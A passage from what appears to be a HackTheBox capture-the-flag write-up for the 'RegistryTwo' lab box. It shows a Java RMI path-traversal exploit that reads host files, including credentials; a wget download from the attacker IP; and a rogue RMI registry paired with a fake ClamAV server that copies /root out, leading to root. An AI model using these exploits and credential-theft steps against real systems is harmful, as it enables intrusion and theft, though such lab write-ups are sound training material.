private static final Logger log = Logger.getLogger(com.htb.hosting.rmi.RMIClientWrapper.class.getSimpleName());
public static FileService get() {
try {
String rmiHost = "registry.webhosting.htb";
Registry registry = LocateRegistry.getRegistry(rmiHost, 9002);
return (FileService)registry.lookup("FileService");
} catch (Exception e) {
e.printStackTrace();
throw new RuntimeException(e);
}
}
}
I’ll add a Main
Java class at the root of src
:
With a bit of playing around, I’ll build a Java program that will read files and list directories. I’m going to show just my final project, but it took many iterations of adding something, running it, looking at the results, updating to get to here. Getting direct access to the RMI port, either using the IPv6 unintended I cover in Beyond Root or tunneling with Chisel, makes this go must faster, but I’ll show the intended path here for completeness.
My Main
class ends up as:
import com.htb.hosting.rmi.AbstractFile;
import com.htb.hosting.rmi.FileService;
import com.htb.hosting.rmi.RMIClientWrapper;
import java.util.List;
public class Main {
public static void usage() {
System.out.println("Usage: exploit [vhost] [cmd] [path]\n cmd is ls or cat");
System.exit(0);
}
public static void main(String[] args) {
FileService fileService = RMIClientWrapper.get();
if (args.length != 3) {
usage();
}
try {
if (args[1].equals("cat")) {
byte[] result = fileService.view(args[0], "../../" + args[2]);
System.out.println(new String(result));
} else if (args[1].equals("ls")) {
List<AbstractFile> files = fileService.list(args[0], "../../" + args[2]);
for (AbstractFile file : files) {
System.out.println(file.getDisplayName());
}
} else {
System.out.println("Unknown command: " + args[1]);
usage();
}
} catch (Exception ex) {
System.out.println("Something went wrong");
usage();
}
}
}
It takes in a vhost id, cmd of “ls” or “cat”, and file path as arguments.
If I build this with a modern version of Java, when I try to run it on the container on RegistryTwo, it will fail:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls .
Error: A JNI error has occurred, please check your installation and try again
Exception in thread "main" java.lang.UnsupportedClassVersionError: Main has been compiled by a more recent version of the Java Runtime (class file version 61.0), this version of the Java Runtime only recognizes
class file versions up to 52.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:763)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:467)
at java.net.URLClassLoader.access$100(URLClassLoader.java:73)
at java.net.URLClassLoader$1.run(URLClassLoader.java:368)
at java.net.URLClassLoader$1.run(URLClassLoader.java:362)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:361)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at sun.launcher.LauncherHelper.checkAndLoadMain(LauncherHelper.java:495)
There’s a table on this Stack Overflow answer that shows what version of Java maps to what major version. I need to go back to Java 8. I’ll run sudo apt install openjdk-8-jdk
, and then in File -> Project Structure, on the Project tab, select that JDK (Java 8 shows as 1.8 for some reason):
To run this, I’ll have IDEA build a JAR file. First, I’ll need to add an artifact output under File -> Project Structure, then under the Artifacts menu click the “+” -> JAR -> From module with dependencies…:
I’ll select Main
as my Main Class and click OK to get out.
Now under Build > Build Artifacts I’ll select EvilRMI:jar -> Rebuild and it generates EvilRMI.jar
:
I’ll upload EVilRMI.jar
to the container on RegistryTwo:
bash-4.4$ wget 10.10.14.6/EvilRMI.jar
Connecting to 10.10.14.6 (10.10.14.6:80)
EvilRMI.jar 100% |*******************************| 4741 0:00:00 ETA
I’ll run it giving it one of the domains from the list on the website, and the ls
command with .
to list the current directory:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls .
..
initrd.img
opt
sbin
snap
root
var
proc
mnt
vmlinuz
vmlinuz.old
boot
tmp
initrd.img.old
cdrom
home
lib64
quarantine
run
dev
sys
etc
media
usr
srv
lib
sites
lost+found
bin
When I first build the client, this was in the /sites/[vhost]
directory and showed index.html
. As I played with the development, it was easier to add in the ../../
to the code so that it based out of /
.
With this ability to list directories and read files, I’ll look at the filesystem. There’s a single home directory:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls /home
..
developer
Whatever user this is running as can read in it:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce ls /home/developer
..
.cache
.bash_logout
.bashrc
.bash_history
.git-credentials
user.txt
.gnupg
.profile
.vimrc
.git-credentials
is interestring:
bash-4.4$ java -jar EvilRMI.jar c0a4a2cfd9ce cat /home/developer/.git-credentials
https://irogir:qybWiMTRg0sIHz4beSTUzrVIl7t3YsCj9@github.com
Those creds work for the developer user over SSH:
oxdf@hacky$ sshpass -p qybWiMTRg0sIHz4beSTUzrVIl7t3YsCj9 ssh developer@webhosting.htb
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)
...[snip]...
developer@registry:~$
And get user.txt
:
developer@registry:~$ cat user.txt
25044958************************
This appears to be the host system. The developer user’s home directory doesn’t have anything else of interest:
developer@registry:~$ ls -la
total 40
drwxr-xr-x 4 developer developer 4096 Jul 5 2023 .
drwxr-xr-x 3 root root 4096 Jul 5 2023 ..
lrwxrwxrwx 1 developer developer 9 Mar 27 2023 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer 220 Mar 26 2023 .bash_logout
-rw-r--r-- 1 developer developer 3771 Mar 26 2023 .bashrc
drwx------ 2 developer developer 4096 Jul 5 2023 .cache
-rw-r--r-- 1 developer developer 60 Mar 26 2023 .git-credentials
drwx------ 3 developer developer 4096 Jul 5 2023 .gnupg
-rw-r--r-- 1 developer developer 807 Mar 26 2023 .profile
-rw-r----- 1 root developer 33 Jan 26 20:49 user.txt
-rw-r--r-- 1 developer developer 39 Jun 16 2023 .vimrc
The various websites are in /sites
:
developer@registry:/sites$ ls
www.static-482f6175cb85.webhosting.htb www.static-68d01707c93f.webhosting.htb www.static-e492442a4be9.webhosting.htb
www.static-5403e43655a0.webhosting.htb www.static-950ba61ab119.webhosting.htb www.static-e511acc71eed.webhosting.htb
www.static-5762637d572b.webhosting.htb www.static-c0a4a2cfd9ce.webhosting.htb www.static-f7200b8c1225.webhosting.htb
www.static-5a9d1f63c28c.webhosting.htb www.static-dd1305ddf270.webhosting.htb www.webhosting.htb
I’ll dig a bit more into how the website is configured in Beyond Root, but it’s not important for escalating to root.
The only thing really interesting on this file system is in /opt
:
developer@registry:/opt$ ls
containerd registry.jar
pspy shows there are few different crons running on this host.
/root/tomcat-app/reset.sh
, which uses sleeps in a loop to effectively reset the Tomcat settings every 10 seconds./usr/local/sbin/vhosts-manage -m quarantine
- every minutesystemctl restart registry.service
- every three minutesvhost-manage
is an ELF binary:
developer@registry:~$ file /usr/local/sbin/vhosts-manage
/usr/local/sbin/vhosts-manage: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6ca6e5eb6a2863662d6c620d59fed33db34da2b4, with debug_info, not stripped
vhost-manage
runs a JAR file. It doesn’t run for very long, so PSpy often misses it, but it does catch it occasionally:
2024/01/30 19:48:01 CMD: UID=0 PID=18869 | /usr/local/sbin/vhosts-manage -m quarantine
2024/01/30 19:48:01 CMD: UID=0 PID=18871 | /usr/bin/java -jar /usr/share/vhost-manage/includes/quarantine.jar
If I run PSpy with -f
for file system events, it catches it all the time:
2024/01/30 20:15:01 CMD: UID=0 PID=21075 | /usr/local/sbin/vhosts-manage -m quarantine
2024/01/30 20:15:01 FS: OPEN | /usr/lib/jvm/java-17-openjdk-amd64/bin/java
2024/01/30 20:15:01 FS: ACCESS | /usr/lib/jvm/java-17-openjdk-amd64/bin/java
2024/01/30 20:15:01 FS: OPEN | /usr/lib/jvm/java-17-openjdk-amd64/lib/libjli.so
2024/01/30 20:15:01 FS: ACCESS | /usr/lib/jvm/java-17-openjdk-amd64/lib/libjli.so
2024/01/30 20:15:01 FS: OPEN | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: ACCESS | /usr/share/vhost-manage/includes/quarantine.jar
2024/01/30 20:15:01 FS: CLOSE_NOWRITE | /usr/share/vhost-manage/includes/quarantine.jar
The includes
directory is a string in vhost-manage
, and if I had to guess, I’d suggest -m
is giving it a module to load.
quarantine.jar
is the only file in /usr/share/vhost-manage/includes
:
developer@registry:~$ ls /usr/share/vhost-manage/includes/
quarantine.jar
I’ll bring a copy back to my VM, and (after verifying the hashes match) open it in jd-gui
. It’s files are all in com.htb.hosting.rmi
, and it seems to have to do with ClamAV:
The main
function gets a Client
and calls scan()
:
package com.htb.hosting.rmi;
public class Main {
public static void main(String[] args) {
try {
(new Client()).scan();
} catch (Throwable e) {
Client.out(1024, "an unknown error occurred", new Object[0]);
e.printStackTrace();
}
}
}
The Client
constructor function connects to the same local RMI instance on 9002 and gets a configuration, using that to create a ClamScan
instance:
public Client() throws RemoteException, NotBoundException {
Registry registry = LocateRegistry.getRegistry("localhost", 9002);
QuarantineService server = (QuarantineService)registry.lookup("QuarantineService");
this.config = server.getConfiguration();
this.clamScan = new ClamScan(this.config);
}
scan
is simple as well. It gets the directory from the config, gets the files from the directory, and then loops over them calling doScan
:
public void scan() {
File[] documentRoots = this.config.getMonitorDirectory().listFiles();
if (documentRoots == null || documentRoots.length == 0) {
out(256, "exiting", new Object[0]);
return;
}
out("initialize scan for %d domains", new Object[] { Integer.valueOf(documentRoots.length) });
for (File documentRoot : documentRoots)
doScan(documentRoot);
}
doScan
checks if it’s been passed a directory, and if so, loops over the contents passing them to itself. If not, then it runs clamScan.scanPath
on it, and if it returns FAILED
, passes the file to quarantine
:
private void doScan(File file) {
if (file.isDirectory()) {
File[] files = file.listFiles();
if (files != null)
for (File f : files)
doScan(f);
} else {
try {
Path path = file.toPath();
try {
if (Files.isSymbolicLink(path)) {
out(16, "skipping %s", new Object[] { file.getAbsolutePath() });
return;
}
} catch (Exception e) {
out(16, "unknown error occurred when processing %s\n", new Object[] { file });
return;
}
ScanResult scanResult = this.clamScan.scanPath(path.toAbsolutePath().toString());
switch (scanResult.getStatus()) {
case ERROR:
out(768, "there was an error when checking %s", new Object[] { file.getAbsolutePath() });
break;
case FAILED:
out(32, "%s was identified as a potential risk. applying quarantine ...", new Object[] { file
.getAbsolutePath() });
quarantine(file);
break;
case PASSED:
out(0, "%s status ok", new Object[] { file.getAbsolutePath() });
break;
}
} catch (IOException e) {
out(512, "io error processing %s", new Object[] { file.getAbsolutePath() });
}
}
}
quarantine
simply copies the file to a folder specified in the config.
The ClamScan
class constructor loads the configuration:
public ClamScan(QuarantineConfiguration quarantineConfiguration) {
setHost(quarantineConfiguration.getClamHost());
setPort(quarantineConfiguration.getClamPort());
setTimeout(quarantineConfiguration.getClamTimeout());
}
The scanPath
method connects to the host and post over a socket sending data about the file, and then gets a response and turns it into a ScanResult
object.
public ScanResult scanPath(String path) throws IOException {
Socket socket = new Socket();
try {
socket.connect(new InetSocketAddress(getHost(), getPort()));
} catch (IOException e) {
Client.out(768, "could not connect to clamd server", new Object[0]);
return new ScanResult(e);
}
try {
socket.setSoTimeout(getTimeout());
} catch (SocketException e) {
Client.out(768, "could not set socket timeout to " + getTimeout() + "ms", new Object[0]);
}
DataOutputStream dos = null;
String response = "";
try {
int read;
try {
dos = new DataOutputStream(socket.getOutputStream());
} catch (IOException e) {
Client.out(768, "could not open socket OutputStream", new Object[0]);
return new ScanResult(e);
}
try {
byte[] b = String.format("zSCAN %s\000", new Object[] { path }).getBytes();
dos.write(b);
} catch (IOException e) {
Client.out(768, "error writing SCAN command", new Object[0]);
return new ScanResult(e);
}
byte[] buffer = new byte[2048];
try {
read = socket.getInputStream().read(buffer);
} catch (IOException e) {
Client.out(768, "error reading result from socket", new Object[0]);
read = 0;
}
if (read > 0)
response = new String(buffer, 0, read);
} finally {
if (dos != null)
try {
dos.close();
} catch (IOException e) {
Client.out(768, "exception closing DOS", new Object[0]);
}
try {
socket.close();
} catch (IOException e) {
Client.out(768, "exception closing socket", new Object[0]);
}
}
return new ScanResult(response.trim());
}
The response string is used to create a ScanResult
object that is returned.
/etc/systemd/system/registry.service
defines the registry
service:
[Unit]
Description=rmi registry service
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=rmi-service
ExecStart=/usr/lib/jvm/java-11-openjdk-amd64/bin/java -jar /opt/registry.jar
[Install]
WantedBy=multi-user.target
It’s running registry.jar
noted above. It’s running as the rmi-service user. It’s not clear if that user is a target or not.
The registry.jar
file is the RMI server. It is based from a com.htb.hosting.rmi
package:
Server
has the main
function, creating a RMI registry listening on 9002 and giving it two services, FileService
and QuarantineSevice
:
public class Server {
public static void main(String[] args) throws Exception {
int port = 9002;
System.setProperty("java.rmi.server.hostname", "registry.webhosting.htb");
Registry registry = LocateRegistry.createRegistry(9002);
System.out.printf("[+] Bound to %d\n", new Object[] { Integer.valueOf(9002) });
FileService fileService = new FileServiceImpl();
FileService fileServiceStub = (FileService)UnicastRemoteObject.exportObject(fileService, 0);
registry.bind("FileService", fileServiceStub);
QuarantineServiceImpl quarantineServiceImpl = new QuarantineServiceImpl();
QuarantineService quarantineServiceStub = (QuarantineService)UnicastRemoteObject.exportObject((Remote)quarantineServiceImpl, 0);
registry.bind("QuarantineService", (Remote)quarantineServiceStub);
}
}
The FileService
is something I’ve already explored. It’s got the same interface in FileService.class
, but that class is implemented in FileServiceImpl.class
.
The more interesting bit is the Quarantine bits. The QuarantineSevice
and QuarantineServiceImpl
classes offer only one method besides the constructor:
public class QuarantineServiceImpl implements QuarantineService {
private static final Logger logger = Logger.getLogger(QuarantineServiceImpl.class.getSimpleName());
private static final QuarantineConfiguration DEFAULT_CONFIG = new QuarantineConfiguration(new File("/root/quarantine"), FileServiceConstants.SITES_DIRECTORY, "localhost", 3310, 1000);
public QuarantineConfiguration getConfiguration() throws RemoteException {
logger.info("client fetching configuration");
return DEFAULT_CONFIG;
}
}
The default configuration is to quarantine to /root/quarantine
, scan /sites
, and talk to ClamAV on localhost:3310
with a one second timeout.
Every three minutes, the registry server reloads. That means it stops listening on 9002 and then restarts listening on 9002. That means if I can start my own rogue registry service in that window, I can take over the registry service.
Every minute, the quarantine process is going to load a configuration from the RMI registry. It then scans a folder, connects to a ClamAV server, and based on the response, may copy the scanned file to a quarantine folder. The scanned folder, IP and port of the ClamAV server, and quarantine folder are are specified in the configuration from the registry.
I’m going to have a rogue registry server return a configuration that scans /root
, contacts me as the ClamAV server, and quarantines to a folder I can read, giving me a full copy of /root
.
I’ll open registry.jar
in Recaf, a very neat tool that can edit Jar files. The class I need to modify is QuarantineServiceImpl
where it generates the QuarantineConfiguration
object:
The arguments for the object are directory to quarantine to, directory to scan, clam host, clam port, and timeout. I’ll update that line to:
private static final QuarantineConfiguration DEFAULT_CONFIG = new QuarantineConfiguration(new File("/dev/shm"), new File("/root/"), "10.10.14.6", 3310, 1000);
I’ll export the new JAR as registry-0xdf.jar
.
The simplest way to root this box is just to use nc
as the ClamAV server. I don’t think this was supposed to work, but it does.
I’ll upload registry-0xdf.jar
to RegistryTwo. Running it will almost certainly cause a BindException
:
developer@registry:/dev/shm$ java -jar registry-0xdf.jar
Exception in thread "main" java.rmi.server.ExportException: Port already in use: 9002; nested exception is:
java.net.BindException: Address already in use
at java.rmi/sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:346)
at java.rmi/sun.rmi.transport.tcp.TCPTransport.exportObject(TCPTransport.java:243)
at java.rmi/sun.rmi.transport.tcp.TCPEndpoint.exportObject(TCPEndpoint.java:415)
at java.rmi/sun.rmi.transport.LiveRef.exportObject(LiveRef.java:147)
at java.rmi/sun.rmi.server.UnicastServerRef.exportObject(UnicastServerRef.java:235)
at java.rmi/sun.rmi.registry.RegistryImpl.setup(RegistryImpl.java:223)
at java.rmi/sun.rmi.registry.RegistryImpl.<init>(RegistryImpl.java:208)
at java.rmi/java.rmi.registry.LocateRegistry.createRegistry(LocateRegistry.java:203)
at com.htb.hosting.rmi.Server.main(Server.java:15)
Caused by: java.net.BindException: Address already in use
at java.base/sun.nio.ch.Net.bind0(Native Method)
at java.base/sun.nio.ch.Net.bind(Net.java:555)
at java.base/sun.nio.ch.Net.bind(Net.java:544)
at java.base/sun.nio.ch.NioSocketImpl.bind(NioSocketImpl.java:643)
at java.base/java.net.ServerSocket.bind(ServerSocket.java:388)
at java.base/java.net.ServerSocket.<init>(ServerSocket.java:274)
at java.base/java.net.ServerSocket.<init>(ServerSocket.java:167)
at java.rmi/sun.rmi.transport.tcp.TCPDirectSocketFactory.createServerSocket(TCPDirectSocketFactory.java:45)
at java.rmi/sun.rmi.transport.tcp.TCPEndpoint.newServerSocket(TCPEndpoint.java:673)
at java.rmi/sun.rmi.transport.tcp.TCPTransport.listen(TCPTransport.java:335)
... 8 more
That’s because the real registry is already bound on 9002. I’ll use this loop to constantly start my registry until it works:
while ! java -jar registry-0xdf.jar 2>/dev/null; do printf "\r%s" "$(date)"; done
It will try to run the registry and if it works, exit the loop. Otherwise, it prints the date on the screen so I can watch the time increase towards a minute divisible by three:
Once the service resets, my rogue registry grabs the port and the real one will fail, typically one second after the reset. Now the next minute when the scan starts, I’ll start getting connections to my nc
, which I run with nc -lnvkp 3310
. The -k
allows that single listener to get multiple connections.
oxdf@hacky$ nc -lvnkp 3310
Listening on 0.0.0.0 3310
Connection received on 10.10.11.223 35118
zSCAN /root/.docker/buildx/.lockConnection received on 10.10.11.223 35126
zSCAN /root/.docker/buildx/currentConnection received on 10.10.11.223 35136
zSCAN /root/.docker/.buildNodeIDConnection received on 10.10.11.223 35148
zSCAN /root/.docker/.token_seed.lockConnection received on 10.10.11.223 35152
zSCAN /root/.docker/config.jsonConnection received on 10.10.11.223 35160
zSCAN /root/.docker/.token_seedConnection received on 10.10.11.223 35176
zSCAN /root/.lesshstConnection received on 10.10.11.223 35188
...[snip]...
This moves really slowly. The nc
connection hangs open until the client times out, and then it moves to the next file, and there are a lot of files. I don’t believe this was supposed to work, but it does - the files are quarantined:
developer@registry:/dev/shm$ ls
quarantine-run-2024-01-31T15:38:27.565107283 quarantine-run-2024-01-31T15:38:34.993189226 quarantine-run-2024-01-31T15:38:42.548797705
quarantine-run-2024-01-31T15:38:27.753866048 quarantine-run-2024-01-31T15:38:35.188953456 quarantine-run-2024-01-31T15:38:42.741363684
quarantine-run-2024-01-31T15:38:27.940511288 quarantine-run-2024-01-31T15:38:35.389759415 quarantine-run-2024-01-31T15:38:42.935289133
quarantine-run-2024-01-31T15:38:28.126540311 quarantine-run-2024-01-31T15:38:35.576085425 quarantine-run-2024-01-31T15:38:43.122035242
quarantine-run-2024-01-31T15:38:28.314376014 quarantine-run-2024-01-31T15:38:35.775290591 quarantine-run-2024-01-31T15:38:43.315574126
quarantine-run-2024-01-31T15:38:28.504268527 quarantine-run-2024-01-31T15:38:35.965004668 quarantine-run-2024-01-31T15:38:43.502664140
quarantine-run-2024-01-31T15:38:28.691709279 quarantine-run-2024-01-31T15:38:36.159227375 quarantine-run-2024-01-31T15:38:43.694310373
quarantine-run-2024-01-31T15:38:28.887762591 quarantine-run-2024-01-31T15:38:36.362928867 quarantine-run-2024-01-31T15:38:43.885759506
quarantine-run-2024-01-31T15:38:29.076483425 quarantine-run-2024-01-31T15:38:36.554182383 quarantine-run-2024-01-31T15:38:44.074739135
quarantine-run-2024-01-31T15:38:29.264766277 quarantine-run-2024-01-31T15:38:36.741290581 quarantine-run-2024-01-31T15:38:44.266947883
quarantine-run-2024-01-31T15:38:29.453268150 quarantine-run-2024-01-31T15:38:36.936020630 quarantine-run-2024-01-31T15:38:44.458115378
quarantine-run-2024-01-31T15:38:29.641858258 quarantine-run-2024-01-31T15:38:37.122417804 quarantine-run-2024-01-31T15:38:44.648628815
quarantine-run-2024-01-31T15:38:29.829106289 quarantine-run-2024-01-31T15:38:37.311152715 quarantine-run-2024-01-31T15:38:44.836004996
quarantine-run-2024-01-31T15:38:30.016599820 quarantine-run-2024-01-31T15:38:37.499389190 quarantine-run-2024-01-31T15:38:45.024569737
quarantine-run-2024-01-31T15:38:30.203721293 quarantine-run-2024-01-31T15:38:37.710029230 quarantine-run-2024-01-31T15:38:45.213802842
quarantine-run-2024-01-31T15:38:30.391650472 quarantine-run-2024-01-31T15:38:37.896403742 quarantine-run-2024-01-31T15:38:45.401849461
quarantine-run-2024-01-31T15:38:30.581197496 quarantine-run-2024-01-31T15:38:38.086732813 quarantine-run-2024-01-31T15:38:45.590774148
quarantine-run-2024-01-31T15:38:30.770517324 quarantine-run-2024-01-31T15:38:38.303797569 quarantine-run-2024-01-31T15:38:45.779301809
quarantine-run-2024-01-31T15:38:30.957946925 quarantine-run-2024-01-31T15:38:38.493119240 quarantine-run-2024-01-31T15:38:45.968093266
quarantine-run-2024-01-31T15:38:31.146062714 quarantine-run-2024-01-31T15:38:38.682914640 quarantine-run-2024-01-31T15:38:46.162644259
quarantine-run-2024-01-31T15:38:31.334928059 quarantine-run-2024-01-31T15:38:38.870295600 quarantine-run-2024-01-31T15:38:46.354489114
quarantine-run-2024-01-31T15:38:31.548550375 quarantine-run-2024-01-31T15:38:39.080112426 quarantine-run-2024-01-31T15:38:46.542343883
quarantine-run-2024-01-31T15:38:31.737135925 quarantine-run-2024-01-31T15:38:39.270579486 quarantine-run-2024-01-31T15:38:46.733970269
quarantine-run-2024-01-31T15:38:31.937834242 quarantine-run-2024-01-31T15:38:39.495741695 quarantine-run-2024-01-31T15:38:46.921844354
quarantine-run-2024-01-31T15:38:32.137803952 quarantine-run-2024-01-31T15:38:39.687413335 quarantine-run-2024-01-31T15:38:47.108012117
quarantine-run-2024-01-31T15:38:32.327866453 quarantine-run-2024-01-31T15:38:39.876715309 quarantine-run-2024-01-31T15:38:47.294763005
quarantine-run-2024-01-31T15:38:32.518394137 quarantine-run-2024-01-31T15:38:40.071941148 quarantine-run-2024-01-31T15:38:47.495398054
quarantine-run-2024-01-31T15:38:32.709811641 quarantine-run-2024-01-31T15:38:40.269791362 quarantine-run-2024-01-31T15:38:47.683618809
quarantine-run-2024-01-31T15:38:32.899408258 quarantine-run-2024-01-31T15:38:40.459516891 quarantine-run-2024-01-31T15:38:47.872446794
quarantine-run-2024-01-31T15:38:33.086934170 quarantine-run-2024-01-31T15:38:40.647931731 quarantine-run-2024-01-31T15:38:48.063708616
quarantine-run-2024-01-31T15:38:33.273078941 quarantine-run-2024-01-31T15:38:40.850089917 quarantine-run-2024-01-31T15:38:48.253123362
quarantine-run-2024-01-31T15:38:33.461460137 quarantine-run-2024-01-31T15:38:41.041608981 quarantine-run-2024-01-31T15:38:48.443913668
quarantine-run-2024-01-31T15:38:33.654801200 quarantine-run-2024-01-31T15:38:41.233143634 quarantine-run-2024-01-31T15:38:48.634081938
quarantine-run-2024-01-31T15:38:33.844774554 quarantine-run-2024-01-31T15:38:41.422876948 quarantine-run-2024-01-31T15:38:48.843981690
quarantine-run-2024-01-31T15:38:34.038609373 quarantine-run-2024-01-31T15:38:41.610882780 quarantine-run-2024-01-31T15:38:49.067259362
quarantine-run-2024-01-31T15:38:34.228551028 quarantine-run-2024-01-31T15:38:41.798567340 quarantine-run-2024-01-31T15:38:49.284299160
quarantine-run-2024-01-31T15:38:34.415150020 quarantine-run-2024-01-31T15:38:41.987391758 registry-0xdf.jar
quarantine-run-2024-01-31T15:38:34.616711968 quarantine-run-2024-01-31T15:38:42.173566725
quarantine-run-2024-01-31T15:38:34.804033717 quarantine-run-2024-01-31T15:38:42.361324793
Each directory has a file in it:
developer@registry:/dev/shm$ ls quarantine-run-2024-01-31T15\:38\:49.284299160/
_root_iptables.sh
Including one with creds for Git just like developer:
developer@registry:/dev/shm$ cat ./quarantine-run-2024-01-31T15:38:30.581197496/_root_.git-credentials
https://admin:52nWqz3tejiImlbsihtV@github.com
Making a Python socket server that will respond appropriately is a bit trickier. I need to understand the message that should come back in the response. The response is handled in ClamScan
in the scanFile
function, and passed into the constructor of a ScanResult
object. It gets handled here:
public void setResult(String result) {
this.result = result;
if (result == null) {
this.setStatus(Status.ERROR);
} else if (result.contains(RESPONSE_OK)) {
this.setStatus(Status.PASSED);
} else if (result.endsWith(FOUND_SUFFIX)) {
this.setSignature(result.substring(STREAM_PREFIX.length(), result.lastIndexOf(FOUND_SUFFIX) - 1));
} else if (result.endsWith(ERROR_SUFFIX)) {
this.setStatus(Status.ERROR);
}
}
To get quarantined, I need the result to end with FOUND_SUFFIX
so it doesn’t change the status
, which is initialized to FAILED
earlier. FOUND_SUFFIX
is just “FOUND”. It also has to be long enough, as it has to do a substring starting after the length of “stream: “.
With that in mind, and with a bit of help from ChatGPT, I’ll quickly create this Python server:
import socket
import threading
def handle_client(client_socket):
data = client_socket.recv(4096).decode('utf-8')
print(data)
client_socket.send(f"stream: 0xdf FOUND".encode('utf-8'))
client_socket.close()
def main():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 3310))
server.listen(5)
print("[*] Listening on port 3310")
try:
while True:
client, address = server.accept()
print("[*] Accepted connection from: {}:{}".format(address[0], address[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
except KeyboardInterrupt:
print("\n[*] Exiting...")
server.close()
if __name__ == "__main__":
main()
This handles all of /root
in ~20-25 seconds, where as the nc
approach took over two minutes.
root is not allowed to SSH with password, but those creds work with su
to get a root shell:
developer@registry:/dev/shm$ su -
Password:
root@registry:~#
And the root flag:
root@registry:~# cat root.txt
9f2dc423************************
There are a few neat unintended paths that I’m aware of for RegistryTwo:
flowchart TD;
A[Enumeration]--Docker Registry-->B(hosting-app Image);
B--/..;/ and\nSessions Manipulation-->C(Admin Access);
C-->D(RMI Deserialization);
D-->E[Shell as app in Container];
E-->F(File Read on Host via RMI);
F-->G[Shell as Developer];
E-. ifconfig .->H(Find IPv6);
H-->F;
A--/..;/ and\nSessions File Read-->B;
B--/..;/ and\nSessions File Read-->H;
B--Shared Lab\nEnumeration-->H;
subgraph Legend
direction LR
start1[ ] --->|intended| stop1[ ]
style start1 height:0px;
style stop1 height:0px;
start2[ ] --->|unintended| stop2[ ]
style start2 height:0px;
style stop2 height:0px;
start3[ ] --->|TheATeam| stop3[ ]
style start3 height:0px;
style stop3 height:0px;
end
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 0,1,2,3,4,5,11 stroke-width:2px,stroke:#4B9CD3,fill:none;
linkStyle 6,13 stroke-width:2px,stroke:#FFFF99,fill:none,stroke-dasharray:3;
style Legend fill:#1d1d1d,color:#FFF;
It’s possible to skip the entire Docker Registry enumeration using the File Read from the Sessions Example page. Enumeration already suggested this was a Java Web application, but by setting the editing file to /proc/self/cmdline
, it affirms that it is Tomcat:
The page source shows that the data is loaded as a base64 blob and then decoded onto the page:
I’ll use that blog plus base64 -d
and tr '\0' ' '
to decode this into a readable command line:
oxdf@hacky$ echo "L3Vzci9saWIvanZtL2phdmEtMS44LW9wZW5qZGsvanJlL2Jpbi9qYXZhAC1EamF2YS51dGlsLmxvZ2dpbmcuY29uZmlnLmZpbGU9L3Vzci9sb2NhbC90b21jYXQvY29uZi9sb2dnaW5nLnByb3BlcnRpZXMALURqYXZhLnV0aWwubG9nZ2luZy5tYW5hZ2VyPW9yZy5hcGFjaGUuanVsaS5DbGFzc0xvYWRlckxvZ01hbmFnZXIALURqZGsudGxzLmVwaGVtZXJhbERIS2V5U2l6ZT0yMDQ4AC1EamF2YS5wcm90b2NvbC5oYW5kbGVyLnBrZ3M9b3JnLmFwYWNoZS5jYXRhbGluYS53ZWJyZXNvdXJjZXMALURpZ25vcmUuZW5kb3JzZWQuZGlycz0ALWNsYXNzcGF0aAAvdXNyL2xvY2FsL3RvbWNhdC9iaW4vYm9vdHN0cmFwLmphcjovdXNyL2xvY2FsL3RvbWNhdC9iaW4vdG9tY2F0LWp1bGkuamFyAC1EY2F0YWxpbmEuYmFzZT0vdXNyL2xvY2FsL3RvbWNhdAAtRGNhdGFsaW5hLmhvbWU9L3Vzci9sb2NhbC90b21jYXQALURqYXZhLmlvLnRtcGRpcj0vdXNyL2xvY2FsL3RvbWNhdC90ZW1wAG9yZy5hcGFjaGUuY2F0YWxpbmEuc3RhcnR1cC5Cb290c3RyYXAAc3RhcnQA" | base64 -d | tr '\0' ' '
/usr/lib/jvm/java-1.8-openjdk/jre/bin/java -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dignore.endorsed.dirs= -classpath /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp org.apache.catalina.startup.Bootstrap start
Tomcat logs are stored in the Tomcat home directory + /logs
as catalina.[YYYY]-[MM]-[DD].log
. I’ll read the log for today looking for when the server started. There’s this line:
26-Jan-2024 20:49:55.389 INFO [main] org.apache.catalina.startup.HostConfig.deployWAR Deploying web application archive [/usr/local/tomcat/webapps/hosting.war]
Updating the session variable one last time to the hosting.war
path, the viewer is ugly:
But it is a PK = Zip (or War) file. I’ll grab the base64 blob from the source (it takes a while to load entirely) and decode it into the WAR.
I noticed above that 9002 was listening on IPv6, and that it was listening on all interfaces. In theory, I could connect directly to it from my host, but there’s an IPtables rule blocking that. The script that sets this is /root/iptables.sh
:
#! /bin/bash
